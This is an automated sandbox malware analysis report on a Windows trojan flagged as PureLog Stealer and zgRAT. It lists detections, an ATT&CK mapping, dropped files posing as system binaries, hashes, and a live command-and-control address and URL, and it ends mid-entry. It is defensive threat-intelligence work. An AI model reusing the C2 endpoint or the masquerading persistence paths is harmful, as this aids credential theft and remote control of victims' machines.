                          Source: Yara matchFile source: 00000009.00000002.2887155289.0000000003350000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000004.00000002.1770434418.0000000012E51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: ComponentBrokermonitor.exe PID: 3492, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 6340, type: MEMORYSTR
                          Yara detected PureLog Stealer
                          Source: Yara matchFile source: 4.0.ComponentBrokermonitor.exe.980000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000003.1646097008.0000000006A4E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000004.00000000.1733341807.0000000000982000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                          Source: Yara matchFile source: C:\savesSession\ComponentBrokermonitor.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\Default\Videos\OfficeClickToRun.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\jDownloader\config\dllhost.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Recovery\RuntimeBroker.exe, type: DROPPED
                          Source: Yara matchFile source: C:\savesSession\winlogon.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\MSECache\OfficeKMS\FNDmTgDttMjJpiTujJnAGafC.exe, type: DROPPED
                          Yara detected zgRAT
                          Source: Yara matchFile source: 4.0.ComponentBrokermonitor.exe.980000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: C:\savesSession\ComponentBrokermonitor.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\Default\Videos\OfficeClickToRun.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\jDownloader\config\dllhost.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Recovery\RuntimeBroker.exe, type: DROPPED
                          Source: Yara matchFile source: C:\savesSession\winlogon.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\MSECache\OfficeKMS\FNDmTgDttMjJpiTujJnAGafC.exe, type: DROPPED

                          Mitre Att&ck Matrix

                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity Information11
                          Scripting                          		Valid Accounts141
                          Windows Management Instrumentation                          		11
                          Scripting                          		12
                          Process Injection                          		12
                          Masquerading                          		OS Credential Dumping1
                          System Time Discovery                          		Remote Services1
                          Archive Collected Data                          		1
                          Encrypted Channel                          		Exfiltration Over Other Network MediumAbuse Accessibility Features
                          CredentialsDomainsDefault Accounts2
                          Command and Scripting Interpreter                          		1
                          DLL Side-Loading                          		1
                          DLL Side-Loading                          		1
                          Disable or Modify Tools                          		LSASS Memory351
                          Security Software Discovery                          		Remote Desktop Protocol1
                          Clipboard Data                          		1
                          Non-Application Layer Protocol                          		Exfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)251
                          Virtualization/Sandbox Evasion                          		Security Account Manager2
                          Process Discovery                          		SMB/Windows Admin SharesData from Network Shared Drive11
                          Application Layer Protocol                          		Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                          Process Injection                          		NTDS251
                          Virtualization/Sandbox Evasion                          		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                          Deobfuscate/Decode Files or Information                          		LSA Secrets1
                          Application Window Discovery                          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                          Obfuscated Files or Information                          		Cached Domain Credentials3
                          File and Directory Discovery                          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                          Software Packing                          		DCSync157
                          System Information Discovery                          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                          DLL Side-Loading                          		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                          Behavior Graph

                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
                          behaviorgraph top1 signatures2 2 Behavior Graph ID: 1582936 Sample: voed9G7p5s.exe Startdate: 01/01/2025 Architecture: WINDOWS Score: 100 59 Suricata IDS alerts for network traffic 2->59 61 Found malware configuration 2->61 63 Antivirus detection for URL or domain 2->63 65 12 other signatures 2->65 10 voed9G7p5s.exe 3 6 2->10         started        process3 file4 45 C:\savesSession\ComponentBrokermonitor.exe, PE32 10->45 dropped 47 Ay6OSRVd54M0URboub...O7chiTURiJbZUgQ.vbe, data 10->47 dropped 13 wscript.exe 1 10->13         started        process5 signatures6 81 Windows Scripting host queries suspicious COM object (likely to drop second stage) 13->81 16 cmd.exe 1 13->16         started        process7 process8 18 ComponentBrokermonitor.exe 3 23 16->18         started        22 conhost.exe 16->22         started        file9 37 C:\savesSession\winlogon.exe, PE32 18->37 dropped 39 C:\Users\user\Desktop\yIzGwiSf.log, PE32 18->39 dropped 41 C:\Users\user\Desktop\odsQwJqu.log, PE32 18->41 dropped 43 10 other malicious files 18->43 dropped 67 Antivirus detection for dropped file 18->67 69 Multi AV Scanner detection for dropped file 18->69 71 Machine Learning detection for dropped file 18->71 24 cmd.exe 1 18->24         started        signatures10 process11 process12 26 RuntimeBroker.exe 9 24->26         started        31 w32tm.exe 1 24->31         started        33 conhost.exe 24->33         started        35 chcp.com 1 24->35         started        dnsIp13 57 185.239.51.56, 49732, 49735, 49737 MGNHOST-ASRU Russian Federation 26->57 49 C:\Users\user\Desktop\yZRgoalJ.log, PE32 26->49 dropped 51 C:\Users\user\Desktop\vomPhMaQ.log, PE32 26->51 dropped 53 C:\Users\user\Desktop\lAIZxBgi.log, PE32 26->53 dropped 55 4 other malicious files 26->55 dropped 73 Antivirus detection for dropped file 26->73 75 Multi AV Scanner detection for dropped file 26->75 77 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 26->77 79 2 other signatures 26->79 file14 signatures15

                          Screenshots

                          Thumbnails

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand

                          Antivirus, Machine Learning and Genetic Malware Detection

                          Initial Sample

                          SourceDetectionScannerLabelLink
                          voed9G7p5s.exe58%VirustotalBrowse
                          voed9G7p5s.exe71%ReversingLabsWin32.Trojan.Uztuby
                          voed9G7p5s.exe100%Joe Sandbox ML

                          Dropped Files

                          SourceDetectionScannerLabelLink
                          C:\savesSession\ComponentBrokermonitor.exe100%AviraHEUR/AGEN.1323342
                          C:\Users\user\Desktop\MqhNXtrC.log100%AviraTR/AVI.Agent.updqb
                          C:\savesSession\winlogon.exe100%AviraHEUR/AGEN.1323342
                          C:\Program Files (x86)\jDownloader\config\dllhost.exe100%AviraHEUR/AGEN.1323342
                          C:\Users\user\Desktop\HCaVYTBq.log100%AviraTR/AVI.Agent.updqb
                          C:\savesSession\Ay6OSRVd54M0URboub1xHjGCi4U1zMZmQyA39xBzO7chiTURiJbZUgQ.vbe100%AviraVBS/Runner.VPG
                          C:\Users\Default\Videos\OfficeClickToRun.exe100%AviraHEUR/AGEN.1323342
                          C:\Users\user\Desktop\gNqaUEQu.log100%AviraTR/Agent.jbwuj
                          C:\Users\user\AppData\Local\Temp\uT6K3ltlhZ.bat100%AviraBAT/Delbat.C
                          C:\Users\user\Desktop\jpaRTMbF.log100%AviraTR/Agent.jbwuj
                          C:\Recovery\RuntimeBroker.exe100%AviraHEUR/AGEN.1323342
                          C:\Program Files (x86)\MSECache\OfficeKMS\FNDmTgDttMjJpiTujJnAGafC.exe100%AviraHEUR/AGEN.1323342
                          C:\savesSession\ComponentBrokermonitor.exe100%Joe Sandbox ML
                          C:\savesSession\winlogon.exe100%Joe Sandbox ML
                          C:\Program Files (x86)\jDownloader\config\dllhost.exe100%Joe Sandbox ML
                          C:\Users\Default\Videos\OfficeClickToRun.exe100%Joe Sandbox ML
                          C:\Users\user\Desktop\JfKMXbLC.log100%Joe Sandbox ML
                          C:\Recovery\RuntimeBroker.exe100%Joe Sandbox ML
                          C:\Program Files (x86)\MSECache\OfficeKMS\FNDmTgDttMjJpiTujJnAGafC.exe100%Joe Sandbox ML
                          C:\Users\user\Desktop\yZRgoalJ.log100%Joe Sandbox ML
                          C:\Program Files (x86)\MSECache\OfficeKMS\FNDmTgDttMjJpiTujJnAGafC.exe55%ReversingLabsByteCode-MSIL.Trojan.Jalapeno
                          C:\Program Files (x86)\jDownloader\config\dllhost.exe55%ReversingLabsByteCode-MSIL.Trojan.Jalapeno
                          C:\Recovery\RuntimeBroker.exe55%ReversingLabsByteCode-MSIL.Trojan.Jalapeno
                          C:\Users\Default\Videos\OfficeClickToRun.exe55%ReversingLabsByteCode-MSIL.Trojan.Jalapeno
                          C:\Users\user\Desktop\ERuFRGqx.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                          C:\Users\user\Desktop\HCaVYTBq.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                          C:\Users\user\Desktop\HufwPOBJ.log29%ReversingLabs
                          C:\Users\user\Desktop\JfKMXbLC.log5%ReversingLabs
                          C:\Users\user\Desktop\MqhNXtrC.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                          C:\Users\user\Desktop\PYnlzHQq.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                          C:\Users\user\Desktop\eKDszVMz.log25%ReversingLabs
                          C:\Users\user\Desktop\gNqaUEQu.log50%ReversingLabsByteCode-MSIL.Trojan.Generic
                          C:\Users\user\Desktop\jpaRTMbF.log50%ReversingLabsByteCode-MSIL.Trojan.Generic
                          C:\Users\user\Desktop\lAIZxBgi.log17%ReversingLabsByteCode-MSIL.Trojan.Whispergate
                          C:\Users\user\Desktop\odsQwJqu.log17%ReversingLabsByteCode-MSIL.Trojan.Whispergate
                          C:\Users\user\Desktop\vomPhMaQ.log29%ReversingLabs
                          C:\Users\user\Desktop\yIzGwiSf.log25%ReversingLabs
                          C:\Users\user\Desktop\yZRgoalJ.log5%ReversingLabs
                          C:\savesSession\ComponentBrokermonitor.exe55%ReversingLabsByteCode-MSIL.Trojan.Jalapeno
                          C:\savesSession\winlogon.exe55%ReversingLabsByteCode-MSIL.Trojan.Jalapeno

                          Unpacked PE Files

                          No Antivirus matches

                          Domains

                          No Antivirus matches

                          URLs

                          SourceDetectionScannerLabelLink
                          http://185.239.51.56/externalVmpacketlongpollSqldbFloweruniversalCentral.php100%Avira URL Cloudmalware
                          http://185.239H0%Avira URL Cloudsafe
                          http://185.239.51.56/0%Avira URL Cloudsafe
                          http://185.239.51.560%Avira URL Cloudsafe

                          Domains and IPs

                          Contacted Domains

                          No contacted domains info

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://185.239.51.56/externalVmpacketlongpollSqldbFloweruniversalCentral.phptrue
                          • Avira URL Cloud: malware
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://www.apache.org/licenses/LICENSE-2.0RuntimeBroker.exe, 00000009.00000002.2905721742.0000000020292000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://www.fontbureau.comRuntimeBroker.exe, 00000009.00000002.2905721742.0000000020292000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.fontbureau.com/designersGRuntimeBroker.exe, 00000009.00000002.2905721742.0000000020292000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.fontbureau.com/designers/?RuntimeBroker.exe, 00000009.00000002.2905721742.0000000020292000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.founder.com.cn/cn/bTheRuntimeBroker.exe, 00000009.00000002.2905721742.0000000020292000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.fontbureau.com/designers?RuntimeBroker.exe, 00000009.00000002.2905721742.0000000020292000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.tiro.comRuntimeBroker.exe, 00000009.00000002.2905721742.0000000020292000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.fontbureau.com/designersRuntimeBroker.exe, 00000009.00000002.2905721742.0000000020292000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.goodfont.co.krRuntimeBroker.exe, 00000009.00000002.2905721742.0000000020292000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.carterandcone.comlRuntimeBroker.exe, 00000009.00000002.2905721742.0000000020292000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://185.239HRuntimeBroker.exe, 00000009.00000002.2887155289.0000000003350000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.sajatypeworks.comRuntimeBroker.exe, 00000009.00000002.2905721742.0000000020292000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.typography.netDRuntimeBroker.exe, 00000009.00000002.2905721742.0000000020292000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.fontbureau.com/designers/cabarga.htmlNRuntimeBroker.exe, 00000009.00000002.2905721742.0000000020292000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.founder.com.cn/cn/cTheRuntimeBroker.exe, 00000009.00000002.2905721742.0000000020292000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.galapagosdesign.com/staff/dennis.htmRuntimeBroker.exe, 00000009.00000002.2905721742.0000000020292000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://www.founder.com.cn/cnRuntimeBroker.exe, 00000009.00000002.2905721742.0000000020292000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://www.fontbureau.com/designers/frere-user.htmlRuntimeBroker.exe, 00000009.00000002.2905721742.0000000020292000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://www.jiyu-kobo.co.jp/RuntimeBroker.exe, 00000009.00000002.2905721742.0000000020292000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://185.239.51.56RuntimeBroker.exe, 00000009.00000002.2887155289.00000000032D8000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000009.00000002.2887155289.0000000003131000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000009.00000002.2887155289.0000000003350000.00000004.00000800.00020000.00000000.sdmptrue
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.galapagosdesign.com/DPleaseRuntimeBroker.exe, 00000009.00000002.2905721742.0000000020292000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://www.fontbureau.com/designers8RuntimeBroker.exe, 00000009.00000002.2905721742.0000000020292000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://www.fonts.comRuntimeBroker.exe, 00000009.00000002.2905721742.0000000020292000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://www.sandoll.co.krRuntimeBroker.exe, 00000009.00000002.2905721742.0000000020292000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://www.urwpp.deDPleaseRuntimeBroker.exe, 00000009.00000002.2905721742.0000000020292000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://www.zhongyicts.com.cnRuntimeBroker.exe, 00000009.00000002.2905721742.0000000020292000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://185.239.51.56/RuntimeBroker.exe, 00000009.00000002.2887155289.000000000300B000.00000004.00000800.00020000.00000000.sdmptrue
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameComponentBrokermonitor.exe, 00000004.00000002.1765850091.0000000003358000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000009.00000002.2887155289.0000000003131000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://www.sakkal.comRuntimeBroker.exe, 00000009.00000002.2905721742.0000000020292000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high

                                                                              World Map of Contacted IPs

                                                                              • No. of IPs < 25%
                                                                              • 25% < No. of IPs < 50%
                                                                              • 50% < No. of IPs < 75%
                                                                              • 75% < No. of IPs

                                                                              Public IPs

                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                              185.239.51.56
                                                                              		unknownRussian Federation
                                                                              		202423MGNHOST-ASRUtrue

                                                                              General Information

                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                              Analysis ID:1582936
                                                                              Start date and time:2025-01-01 02:26:05 +01:00
                                                                              Joe Sandbox product:CloudBasic
                                                                              Overall analysis duration:0h 7m 19s
                                                                              Hypervisor based Inspection enabled:false
                                                                              Report type:full
                                                                              Cookbook file name:default.jbs
                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                              Number of analysed new started processes analysed:15
                                                                              Number of new started drivers analysed:0
                                                                              Number of existing processes analysed:0
                                                                              Number of existing drivers analysed:0
                                                                              Number of injected processes analysed:0
                                                                              Technologies:
                                                                              • HCA enabled
                                                                              • EGA enabled
                                                                              • AMSI enabled
                                                                              Analysis Mode:default
                                                                              Analysis stop reason:Timeout
                                                                              Sample name:voed9G7p5s.exe
                                                                              renamed because original name is a hash value
                                                                              Original Sample Name:0e22e05075402fd6fc2f0a833d49c288.exe
                                                                              Detection:MAL
                                                                              Classification:mal100.troj.evad.winEXE@18/31@0/1
                                                                              EGA Information:
                                                                              • Successful, ratio: 100%
                                                                              HCA Information:Failed
                                                                              Cookbook Comments:
                                                                              • Found application associated with file extension: .exe

                                                                              Warnings

                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                              • Excluded IPs from analysis (whitelisted): 172.202.163.200, 184.28.90.27, 13.107.246.45
                                                                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                              • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                              • Report size getting too big, too many NtOpenKey calls found.
                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                              Simulations

                                                                              Behavior and APIs

                                                                              TimeTypeDescription
                                                                              20:27:12API Interceptor2137525x Sleep call for process: RuntimeBroker.exe modified

                                                                              Joe Sandbox View / Context

                                                                              IPs

                                                                              No context

                                                                              Domains

                                                                              No context

                                                                              ASNs

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              MGNHOST-ASRUclient.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                              • 193.233.74.21
                                                                              file.exeGet hashmaliciousRedLineBrowse
                                                                              • 193.233.74.8
                                                                              server.bin.exeGet hashmaliciousUrsnifBrowse
                                                                              • 5.44.43.17
                                                                              server.exeGet hashmaliciousUrsnifBrowse
                                                                              • 5.44.43.17
                                                                              server.exeGet hashmaliciousUrsnifBrowse
                                                                              • 5.44.43.17
                                                                              server.exeGet hashmaliciousUrsnifBrowse
                                                                              • 5.44.43.17
                                                                              marzo.txt.urlGet hashmaliciousUrsnifBrowse
                                                                              • 5.44.43.17
                                                                              login.dllGet hashmaliciousUrsnifBrowse
                                                                              • 194.116.163.130
                                                                              login.dllGet hashmaliciousUrsnifBrowse
                                                                              • 194.116.163.130
                                                                              Informazion.exeGet hashmaliciousUrsnif, zgRATBrowse
                                                                              • 193.0.178.157

                                                                              JA3 Fingerprints

                                                                              No context

                                                                              Dropped Files

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              C:\Users\user\Desktop\ERuFRGqx.logKzLetzDiM8.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                f3I38kv.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                  ZZ2sTsJFrt.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                    r6cRyCpdfS.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                      Z4D3XAZ2jB.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                        cbCjTbodwa.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                          vb8DOBZQ4X.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                            6G8OR42xrB.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                              XNPOazHpXF.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                9FwQYJSj4N.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse

                                                                                                  Created / dropped Files

                                                                                                  C:\Program Files (x86)\MSECache\OfficeKMS\7581910bd8b056

                                                                                                  Download File
                                                                                                  Process:C:\savesSession\ComponentBrokermonitor.exe
                                                                                                  File Type:ASCII text, with very long lines (714), with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):714
                                                                                                  Entropy (8bit):5.874966644340267
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12:0sJ0EVGdvWVRVoiSy8sr9OFXQWVpW931hPz6QcFSIzUTYQEqiUZVJv9jl:98WVRq5q9FhCFSN8gZDRl
                                                                                                  MD5:AE2A74521736B100801054DDD817355F
                                                                                                  SHA1:526E908D64EA65280E04B44D19E35D175AED3582
                                                                                                  SHA-256:3977FEC931A9F311B2556B09E3FC6E1C75460CF73E4454D67CA7E362733F8F33
                                                                                                  SHA-512:4A1AD63F34040056DC67B40CC4410FB83CF3BE1007C792C10A15F244DE23210AE0F7F9FAD03EC90329D2334232FA575AA0C97DC29EB9E771E6488E6F8EFF2290
                                                                                                  Malicious:false
                                                                                                  Reputation:low
                                                                                                  Preview:HfAd8P29BpcHbelq5pWVomZPG5bc4V3lt5QzVOBzNP7pMtCNnFUnKyEfGvXDyaFqw0YfOvUqngIYptCW2OzyAPb41vtk18BxKR3VVh91uoAnqp0WtAKjlRphZdncCuyofUOY0qBVP8DWPxOL5W10ybM2lV613gyAzVIVbbgC9yUnNSSmPbhq380DIVweuJcsJCh3p2udzy19GjoTDTmb8HG0fEMGpCSzWldLvY7WrD1FG07jqdaahAuC6qYkpoywfCneFdhpWPt4PBuoHnaLm2RV1aOEAWrDPFjENcdM5uDSRzw46tdBOmJnuRnpOcp9hqpKcpboKNP1y9EBoUIQ3pzm55U5yy7cFDukKlbRRy1AXSyuNlA4UYG20CPgUf0VQxvuPd1C218ExyPnGksNxDIr71tHW57w8gukgEett8BdZBFCxmZtxmiMoExYttp73MGREpGCG8dyCoS5wrUufN8V7h5bQFA9SDjM5x7HfWmzItKAw2lBZ5cpOuTguowB7df8EF98uNOIlJNNX5pXd8kWk38KeaX0kl1oNL5q2nRMrTEFhFJy8Yh83JXLHyeTzXiARiALA9f0rYpRz3nYRi1LD2vExtiDI7WTvEx9F8y93qRedGVOLGBQgW6Zw5XQbbrtBWfvFoSTt2SWlQlqYT2C5FwYHYMKkihc8hdGlkIhxshnEjxfTq1Hipx5jGnrbIsLU0XDxf

                                                                                                  C:\Program Files (x86)\MSECache\OfficeKMS\FNDmTgDttMjJpiTujJnAGafC.exe

                                                                                                  Download File
                                                                                                  Process:C:\savesSession\ComponentBrokermonitor.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2751488
                                                                                                  Entropy (8bit):7.727823728421607
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:49152:QAkaLFN8C62dt9FLvRza00IB4Ipg/DCDYjrMmkZHN0qmt12L:QAkaLN62H9JRza0neIpg/eEjrMmbqW2L
                                                                                                  MD5:43D19D8B3DF29BDFB6AB0D58C3E64424
                                                                                                  SHA1:7726A5D9634749D08E43BF4871B517850D10EE65
                                                                                                  SHA-256:BFC2532FBC133EB2FBDD1C4108084CCB0478FBE6389A9830EF6D9E0E83EA4C38
                                                                                                  SHA-512:44B5DA3EF8844D6B4149058881E8888B45F5CFC52BCB81EA694BA250FF51ADA7538C6085A5F1F07254145B1998453CBD43DE8A941F1A7DB79C40D12EBF97EA9B
                                                                                                  Malicious:true
                                                                                                  Yara Hits:
                                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\MSECache\OfficeKMS\FNDmTgDttMjJpiTujJnAGafC.exe, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\MSECache\OfficeKMS\FNDmTgDttMjJpiTujJnAGafC.exe, Author: Joe Security
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                  • Antivirus: ReversingLabs, Detection: 55%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................)...........*.. ... *...@.. .......................`*...........@...................................*.K.... *.p....................@*...................................................... ............... ..H............text...4.).. ....)................. ..`.rsrc...p.... *.......).............@....reloc.......@*.......).............@..B..................*.....H.......8...........d......s:..T.*......................................0..........(.... ........8........E....N.......M...)...8I...(.... ....~....{....:....& ....8....(.... ....~....{....9....& ....8....*(.... ....8........0..-....... ........8........E....*...........N...........8%......... ....~....{....:....& ....8....8.... ....~....{....:....& ....8........~....(5...~....(9... ....?d... ....~....{c...:_...& ....8T...~....(-... .... .... ....s....~....(1....... ........8

                                                                                                  C:\Program Files (x86)\jDownloader\config\5940a34987c991

                                                                                                  Download File
                                                                                                  Process:C:\savesSession\ComponentBrokermonitor.exe
                                                                                                  File Type:ASCII text, with very long lines (561), with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):561
                                                                                                  Entropy (8bit):5.87120229859433
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12:bb5uHmmeFEtyyayMfESzTpQWJgRHhW6fS2aARXcLj4bwaHeWwtSD:YHmmeqtbaXlzyBRH37cj4b6Ftq
                                                                                                  MD5:2B0105EBE93F09F9856B67EE55F57452
                                                                                                  SHA1:FA157202800862A4249A0D2C9FCF6C32FA03131A
                                                                                                  SHA-256:84ACDC81D859FE53D800A4E55A32459C5531FEF553E7174B1D7EB96CC4B0C2E0
                                                                                                  SHA-512:6348EF63E128AA6C0309260858C71EB751CCFF03FF7CEAEAA176E162035706805CFDFB0B07095E640E8224E6D9F8D9CE4AC491CE700A493AFC55D57999A8C8FC
                                                                                                  Malicious:false
                                                                                                  Preview:JUhkr03qZ3Tthge6bGo9VSOLurylD7NakXawFHtSze56ETQ8k1tOkNM0GWz9CSmcp3JJFs0TWWK1XRHabzALO8zWKkptRuPg1cQLKG32BZ2ODVdyOZiMSbOqEw8fDGCmGn94A6PU6IKyGkTzH0e2LDOaOjHYHXz4XPIZWiySJOQJRZkdcJYMlJbDYjqaz1MiTPb1c3diCMt7wEJy9n589mSNyFAx1XdRCs0C8tBiqzJZZdQUZ2bL5Niq6NCX2qrosb5EOHzQmWRJc3yUzqX86SWyJKFvqnqAIfr8iLFSDKii6ZNDZsiMSssaFH5EBDk8qRB7LzvnkE5vtx1t6CW8FerZwQ2bPBR9kj1oYP1j64lOw7rRPLH8rl2MjlL56UXjw6KJ5MVqLwBL3dnzjlLE4SR8rpFwE6mlgBb0whWCzax4jrTG8VVVITodoMcQHjlPJao1BwDBOJOdfWY9V9ytkRdNW7LkFG5QzhuJCcELSUG9EL8Sxc4Iu2p26beEkd6IN7o7lO634naQKdIL93wmLxg622Ml8AkzY7vGhAqigANHcZscS

                                                                                                  C:\Program Files (x86)\jDownloader\config\dllhost.exe

                                                                                                  Download File
                                                                                                  Process:C:\savesSession\ComponentBrokermonitor.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2751488
                                                                                                  Entropy (8bit):7.727823728421607
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:49152:QAkaLFN8C62dt9FLvRza00IB4Ipg/DCDYjrMmkZHN0qmt12L:QAkaLN62H9JRza0neIpg/eEjrMmbqW2L
                                                                                                  MD5:43D19D8B3DF29BDFB6AB0D58C3E64424
